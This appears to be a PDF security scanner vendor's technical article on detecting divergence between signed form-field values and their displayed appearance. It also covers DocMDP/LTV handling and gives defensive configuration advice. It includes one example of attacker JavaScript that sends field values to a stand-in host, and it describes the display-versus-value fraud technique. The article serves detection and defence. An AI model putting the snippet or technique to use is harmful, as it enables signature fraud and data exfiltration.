Background: Two Data Paths, One Signature
Marc Kaufman retired from Adobe having worked on every version of Acrobat from 2 through 12. He submitted a feedback report through our contact form pointing at a linearization gap in our scanner — our incremental-update detection used a set difference to find injected objects, which silently passed redefined objects carrying the same ID. We fixed it. He then pointed at MDP. We fixed that. He then asked how deep into the V/AP woods we wanted to go.
The answer to that question is the subject of this article.
Every AcroForm field has two independent data stores:
| Key | What it contains | Who reads it |
|---|---|---|
/V |
The machine-readable field value | JavaScript (doc.getField().value), form submission (SubmitForm), digital signature byte-range hash |
/AP /N |
A self-contained PDF content stream that the viewer renders as pixels | The viewer, the user — nothing else |
These two stores are not derived from each other. A PDF author can set
/V to (I agree to transfer $1,000) and author an /AP
stream that renders I agree to transfer $10. The user signs what they see.
The signature covers both. The signed content and the displayed content are
structurally different by construction, inside the certified byte range.
Known Exploitation Patterns
The V/AP gap has been documented in both academic research and operational fraud. In 2021, researchers at Ruhr University Bochum published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs,” demonstrating that content can be concealed inside a signed byte range — invisible to signature validators, visible to the rendering viewer. The disclosure reached 28 PDF viewer vendors and produced patches in Adobe Acrobat, Foxit, and others. The attack class directly exploits the V/AP separation described here: placing different content in the display layer than in the data layer, both within the certified range.
In operational settings, the same mechanism appears in
a simpler form. Signed invoice PDFs where an automated payment system reads
/V while the human signer saw what /AP rendered are a
documented pattern in business email compromise campaigns. A field that displays
“$1,200.00” to the signer while /V holds
“$12,000.00” survives signature validation intact.
Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:
| CVE | Pattern | Mechanism |
|---|---|---|
| CVE-2021-28550 | AcroForm + getField / setFocus JavaScript |
Use-after-free in Acrobat’s form field manipulation path, triggered by specific getField() and setFocus() call sequences in AcroForm JavaScript |
| CVE-2021-21017 | XFA + JavaScript + instanceManager |
Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat |
| CVE-2024-45112 | XFA/AcroForm mixed field access | Type confusion triggered when a document mixes XFA and AcroForm field access in the same session — a pattern not present in legitimately authored forms |
| CVE-2023-21608 | Annotation + event.target JavaScript |
Use-after-free in the annotation engine triggered via event.target references in AcroForm field event handlers (CVSS 7.8) |
XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open — a delivery mechanism less visible to scanners that focus on AcroForm JavaScript paths and do not inspect XFA-embedded scripting separately.
Five Structural Indicators: V/AP Divergence Without Rendering
The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.
/NeedAppearances True
When /NeedAppearances true is present in the AcroForm dictionary
(ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP
from /V at open time. The /AP streams stored on disk are
stale by construction — they may not reflect /V. On its own this
is medium severity: stale AP is common in programmatic form-fill workflows (mail merge,
DocuSign) that update /V but skip AP regeneration before saving.
Combined with a digital signature it is critical.
The byte-range hash covers the stale /AP. The viewer regenerates the
appearance after opening. The signed content and the displayed content are
guaranteed to differ — you cannot construct a signed document where
/NeedAppearances true and the certified bytes equal what the viewer renders.
Checkbox and Radio: /V vs /AS Key Comparison
For checkbox and radio button fields, /AS (Appearance State) selects
which entry in /AP /N the viewer renders. /V is the stored
data value. Both are name objects in the widget annotation dictionary. We extract both
via regex against the xref object and compare them as strings — no rendering,
no approximation.
If /V is /Yes and
/AS is /Off, the displayed state and the stored value
structurally disagree. That fact is in the file regardless of any viewer. This is
the most deterministic V/AP check possible: a pure dictionary key comparison.
In a signed document both /V and
/AS fall within the signed byte range. The mismatch is by construction
inside certified content.
AP Stream Text Extraction: Text, Listbox, Combobox
For text fields, listboxes, and comboboxes, the /AP /N stream is a
PDF content stream containing text drawing operators. We decompress it via PyMuPDF,
extract Tj, TJ, and ' operators, reconstruct
the display string, PDF-unescape it, whitespace-normalise it, and compare it to
/V.
Three encoding cases are handled:
- Literal string /V —
/V (Hello)— extracted directly - Hex-string /V —
/V <48656c6c6f>— decoded viabytes.fromhex(); UTF-16BE (BOMFEFF) detected and decoded correctly - Listbox multi-select array —
/V [(opt1) (opt2)]or[<hex1> <hex2>]— elements joined for comparison
For listbox and combobox fields, /Opt can
store display/export pairs: [[(United States) (us)] [(United Kingdom) (uk)]].
The /V holds the export value (us); the /AP
renders the display label (United States). Without resolving this map,
every legitimately authored dropdown using export-value pairs would fire a false
positive. We build an export→display map from /Opt and substitute
the display label as the comparison target before checking.
When the /AP stream exists but contains
no text drawing operators at all, we flag it separately: the value is present in the
file and covered by any signature, but the field renders blank to the viewer.
Value Set, No AP Defined
When /V is non-empty but no /AP stream exists, the viewer
falls back to the field’s /DA (Default Appearance) and constructs
a rendering itself. The displayed content is viewer-defined — it is not
statically present in the file. Different viewers may render different things.
Medium severity.
Correlation Engine Compound Patterns
Four compound indicators in the weighted correlation engine (Engine 44) fire on combinations:
| Combination | Severity | Why |
|---|---|---|
/NeedAppearances + digital signature |
Critical | Signed bytes guarantee to cover a different appearance than what the viewer displays |
| V/AS mismatch + digital signature | Critical | Displayed state and certified value structurally differ within the same signed byte range |
/NeedAppearances + JS or SubmitForm |
High | Stale AP paired with active form content — the displayed values may differ from what is executed or exfiltrated |
/NeedAppearances + DocMDP constraint violation |
Critical | Uncertified modification rendered visible via viewer-regenerated appearance |
Normal Interactive PDFs vs. Suspicious Patterns
AcroForms, JavaScript, and automatic actions are standard PDF features used
legitimately in millions of documents every day. A sign-and-submit button uses
JavaScript. A government tax form uses an AcroForm with /SubmitForm.
An e-signature platform uses DocMDP to certify the signed content. A mail-merge
system may legitimately produce documents with /NeedAppearances true
because it updates /V programmatically without regenerating
/AP. None of that is inherently suspicious.
The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:
| Feature | Normal use | Suspicious pattern |
|---|---|---|
| AcroForm + JavaScript | Field validation, conditional field visibility, submit-to-URL on a known endpoint | Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value |
/NeedAppearances true |
Programmatic form fill where AP regeneration is deferred (DocuSign, mail merge) | /NeedAppearances true combined with a digital signature — the certified bytes are guaranteed to cover a different appearance than what the viewer shows |
/V vs /AS on a checkbox |
Should always match in a well-formed document | Structural mismatch: /V /Yes but /AS /Off — the stored value and displayed state disagree by construction |
AP stream text vs /V |
Should agree after /Opt export-value resolution |
AP renders “Approved” while /V holds “Rejected”; or AP stream is blank while /V is non-empty |
| DocMDP P=1 + incremental update | DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2 | Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature |
A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and that disagreement is inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises — not one it answers.
JavaScript Field-Value Conditioning: A Behavioral Analysis Gap
JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed
Node.js vm context with a stub of the Acrobat API. The gap documented
here is not specific to any one implementation — it applies to any behavioral
sandbox that does not seed doc.getField() with real /V
values from the file. Previously, a stub returning { value: '' }
for every field was a common default.
The practical consequence: when malicious JavaScript
reads a field value and acts on it — submitting it to a URL, using it in a
conditional branch, passing it to app.launchURL() — the emulator
captured the event with an empty string rather than the actual content. Exploitation
chains conditioned on field values were not followed correctly:
// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}
With value: '', the condition
'' == 'approved' is false — the branch is never taken, the
LAUNCH_URL event is never emitted, and the emulator reports clean.
The correct approach: the AcroForm field enumeration
pass collects a field_values map (field name → /V string)
during widget traversal. The behavioral emulator reads this map and prepends
const _pq_fv = {...}; to the stub before execution.
doc.getField(name) returns the real value from the file;
doc.numFields reflects the true field count.
SUBMIT_FORM and LAUNCH_URL events carry the actual
field content. Signature fields are excluded — their /V is a
PKCS#7 blob, not a meaningful string.
DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits
DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever — not form fill-ins, not annotations, nothing. A nave implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception that such an implementation will violate on a large class of legitimately authored documents.
Marc Kaufman pointed out the gap: ISO 32000-2 §12.8.2.2 NOTE 2 explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.
DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow — it does not modify the certified document content in any MDP sense. Every legitimately LTV-enabled P=1 document was being flagged critical.
The fix detects DSS-only incremental updates: the
section contains /DSS or /VRI and has no execution vectors
(no JavaScript, no /OpenAction), no annotations, no form elements, and
no /AA additional actions. When P=1 and the incremental section is
DSS-only, the scanner emits a low-severity informational note citing the spec section
rather than a bypass finding. If DSS is mixed with any document modification or
execution vector, the full bypass indicator fires as before.
File MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct
transform from DocMDP. Where DocMDP applies a permission level to the entire
document, FieldMDP applies per-approval-signature constraints to named form
fields — specifying which fields are locked and which are not. Both are
detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP
constraint validation is unchanged.
Structural Limits: What Rasterisation Cannot Provide
The question Marc Kaufman asked — “how far into the woods do you want to go?” — has a principled answer. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.
The problems with rasterisation in this context:
- Renderer-specific differences — MuPDF and Ghostscript render the same field differently
- Font fallback differences — missing fonts produce different glyphs on different systems
- DPI-dependent text segmentation — results change with render resolution
- OCR nondeterminism — the same raster produces different strings across runs
- Language-model bias — OCR engines correct toward plausible words, hiding injected content
- False-positive rates that break the guarantees a forensics engine must provide
- Unpredictable latency spikes on large form documents
Everything where V/AP divergence is provable from the raw byte stream — the cases where the file and the display disagree by construction — is covered by the five checks above. The one case that is not covered is a custom font with a remapped encoding where the glyph for code point 0x41 renders as “B” rather than “A” — detecting that requires either running a renderer or parsing the font’s encoding tables and comparing them against the AP stream’s character codes. That is a separate engine, not a V/AP check.
An Open Question: DocMDP P=2 and Incremental Form Fill-ins
DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other
modification. The interaction between P=2 and incremental form fill-ins is the one
area Marc flagged as worth thinking about further. The specific edge case: a
viewer that fills a form field incrementally under P=2, updating /V in
the incremental section, is permitted. A viewer that also regenerates the
/AP stream in the same incremental section may or may not be considered
a permitted modification depending on whether the validator treats AP regeneration as
a document change.
The practical consequence: a certified P=2 document
could have been legitimately filled, producing an incremental /AP update
that some validators accept and others reject. Our scanner currently flags all
incremental object additions under P=2 that contain form elements as potential
violations. Whether a specific update is legitimate depends on whether it was
generated by a compliant form-fill operation or by an attacker modifying fields
outside the permitted scope. We are tracking this as a known nuance, not a confirmed
false positive.
Safe Handling and Configuration
The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.
For Individuals: Viewer Settings
- Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it. JS is only required for complex field validation and multi-step wizards.
- Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
- Open in a browser for untrusted files: Chrome and Firefox open PDFs in pdf.js or the built-in renderer without executing Acrobat JavaScript. This does not prevent V/AP divergence from affecting the display, but it eliminates the JavaScript execution surface entirely.
- Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by checking document properties or exporting form data as FDF/XFDF and comparing to what you see.
For Developers and Pipelines
- Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read
/Vfrom the AcroForm dictionary — not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs. - Sanitize before storing: Strip
/APstreams and rebuild them from/Vwhen your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools.qpdf --generate-appearancesregenerates appearance streams from field values. - Reject
/NeedAppearances truein signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with/NeedAppearances trueand a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match. - Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads
/Vand posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.
For Enterprise and IT
- Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include
bEnableJS(disable JavaScript),bEnhancedSecurityInBrowser, andbEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit. - Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them.
/NeedAppearances truein combination with a signature is a narrower, more reliable signal. - Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
- XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.
Detection Methodology Reference
The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.
| Structural check | What it finds | Severity conditions |
|---|---|---|
/NeedAppearances true |
AP streams are stale by construction — viewer regenerates from /V at open time |
Medium alone; Critical when a digital signature is also present |
Checkbox/radio /V vs /AS key comparison |
Stored data value and displayed appearance state structurally disagree | High; Critical when inside a signed byte range |
| AP stream text extraction (text fields) | Tj/TJ operators reconstructed and compared to /V; literal and hex-string encoding handled |
High; Critical when signed |
| AP stream text extraction (listbox/combobox) | Multi-select array extraction; /Opt export→display map resolved before comparison to prevent false positives on choice fields |
High; Critical when signed |
| Blank AP stream | AP stream present but contains no text drawing operators — value in file, field renders blank | Medium |
Missing AP (/V set, no /AP) |
Display is viewer-defined via /DA — not statically present in the file |
Medium |
| Field-value seeding in JS behavioral analysis | doc.getField() stub receives real /V values; conditional exploitation chains that gate on field content are correctly followed |
Applies to any JS indicator elevated by field-value conditioning |
| DocMDP P=1 + DSS-only incremental update | Incremental section contains /DSS//VRI and no execution vectors, annotations, or form elements — permitted under ISO 32000-2 §12.8.2.2 |
Low (informational); Full bypass severity if DSS is mixed with execution vectors |
Marc Kaufman’s observation — that
PDF/Acrobat is “a Roach Motel: features go in but never come out”
— applies equally to the complexity that accumulates around those features
over three decades. The checks above are designed to avoid false positives on
legitimately authored documents; the /Opt export-value resolution
and hex-string /V handling were added specifically to handle valid
authoring patterns that naive string comparison would misread. Edge cases are
possible; the structural indicators raise questions, not verdicts.